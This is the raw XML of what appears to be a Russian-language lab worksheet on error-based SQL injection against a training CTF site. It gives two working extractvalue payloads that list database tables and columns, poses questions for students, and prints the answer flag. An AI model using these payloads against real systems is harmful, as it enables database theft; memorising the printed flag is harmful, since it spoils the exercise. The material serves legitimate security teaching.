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sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_0"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000001">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
            <w:jc w:val="center"/>
            <w:rPr/>
          </w:pPr>
          <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.gjdgxs" w:id="0"/>
          <w:bookmarkEnd w:id="0"/>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Уязвимости 4 практика часть 1</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_1"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
          <w:pPr>
            <w:rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Сайт:</w:t>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve"> http://errsql.myctf.ru</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_2"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
          <w:pPr>
            <w:rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Requirements:</w:t>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve"> Firefox + hackbar plugin</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_3"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004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4"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
          <w:pPr>
            <w:rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Данный сайт является примером эксплуатации уязвимости типа error-based.</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_5"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006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6"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
          <w:pPr>
            <w:rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Уязвимый код:</w:t>
            <w:br w:type="textWrapping"/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr/>
            <w:drawing>
              <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                <wp:extent cx="5943600" cy="2222500"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="9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2225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7"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008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8"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
          <w:pPr>
            <w:rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Какой вид sql инъекции можно использовать на этом сайте?</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_9"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
          <w:pPr>
            <w:rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:br w:type="textWrapping"/>
            <w:t xml:space="preserve">1) Пробуем авторизоваться, подставив в любое поле кaвычку (‘), в результате чего получаем ошибку. </w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_10"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
          <w:pPr>
            <w:rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">2) Получаем список таблиц в текущей базе:</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_11"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C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tag w:val="goog_rdk_12"/>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D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login=admin' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) -- 123</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_13"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E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4"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
          <w:pPr>
            <w:rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Какой результат вы получили?</w:t>
            <w:br w:type="textWrapping"/>
            <w:t xml:space="preserve">Какой запрос вы предположительно получили?</w:t>
            <w:br w:type="textWrapping"/>
            <w:t xml:space="preserve">Разберите построчно, что именно вы сделали?</w:t>
            <w:br w:type="textWrapping"/>
            <w:br w:type="textWrapping"/>
            <w:t xml:space="preserve">3) Получаем названия столбцов в найденной таблице:</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_15"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010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tag w:val="goog_rdk_16"/>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011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login=admin' and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name='XXXXX' limit 0,1))) -- 123</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_17"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012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18"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
          <w:pPr>
            <w:rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Какой результат вы получили?</w:t>
            <w:br w:type="textWrapping"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_19"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
          <w:pPr>
            <w:rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">4) Достаем флаг.</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_20"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015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1"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
          <w:pPr>
            <w:rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Самостоятельно введите команду, которая выведет все значения из полученных в пунктах 2,3 базы данных и таблицы.</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_22"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
          <w:pPr>
            <w:rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="goog_rdk_23"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
          <w:pPr>
            <w:rPr>
              <w:b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Какой флаг вы получили? </w:t>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">D0nt_sh0w_y0ur_3rr0r5</w:t>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:br w:type="page"/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                <wp:extent cx="5943600" cy="3683000"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="1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683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b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                <wp:extent cx="5943600" cy="3683000"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="4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683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b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                <wp:extent cx="5943600" cy="3683000"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="5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1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683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b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                <wp:extent cx="5943600" cy="3683000"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="6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1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683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b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                <wp:extent cx="5943600" cy="3683000"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="10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1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683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b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                <wp:extent cx="5943600" cy="3683000"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="7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683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b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                <wp:extent cx="5943600" cy="3683000"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="8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683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b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                <wp:extent cx="5943600" cy="3683000"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="13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683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b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                <wp:extent cx="5943600" cy="3683000"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2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683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b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                <wp:extent cx="5943600" cy="3683000"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="12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683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b w:val="1"/>
              <w:color w:val="666666"/>
              <w:highlight w:val="green"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                <wp:extent cx="5943600" cy="3683000"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="3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683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sdtContent>
    </w:sdt>
    <w:sectPr>
      <w:pgSz w:h="15840" w:w="12240"/>
      <w:pgMar w:bottom="247.91338582677326" w:top="283.46456692913387" w:left="566.9291338582677" w:right="737.0078740157493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12.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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8.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9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image" Target="media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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qZRMRRyaDq2mL7EilzS7MpgIufQ==">AMUW2mX5EZEYUGTCdDxpvq1S9Fq987225LUpAfY8W2RdyrOEAGj/CDM6Y1f18f2dCmE4SXdyftTXuNXRGQGzCAH3zHugakantJ+ewyMTBEOvhrgs5IAlGX8MmAfiZZ9DgvIGKZt0T+1X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